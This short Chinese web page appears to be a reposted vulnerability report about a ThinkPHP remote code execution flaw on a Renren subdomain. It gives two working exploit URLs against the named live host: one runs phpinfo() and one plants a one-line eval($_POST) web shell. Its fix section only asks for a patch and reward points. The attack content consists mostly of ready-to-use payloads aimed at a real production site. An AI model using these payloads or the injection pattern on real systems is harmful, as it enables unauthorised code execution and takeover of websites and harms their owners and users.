好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

人人网某分站远程代码执行(已Shell) - 网站安全

#1.人人某个分站由于使用Think php的框架并且未修复其远程代码执行 漏洞 导致存在该漏洞,利用该漏洞可直接执行 PHP 代码:

 

http://innovator.renren.com/index.php/module/action/param1/$%7B@phpinfo()%7D

 

 

 

#2.直接构造一句话:

 

http://innovator.renren.com/index.php/module/action/param1/%7B$%7Beval($_POST[u])%7D%7D

 

修复方案:

仅做了漏洞证明,请修复漏洞,只求20rank!不谢!

查看更多关于人人网某分站远程代码执行(已Shell) - 网站安全的详细内容...

  阅读:73次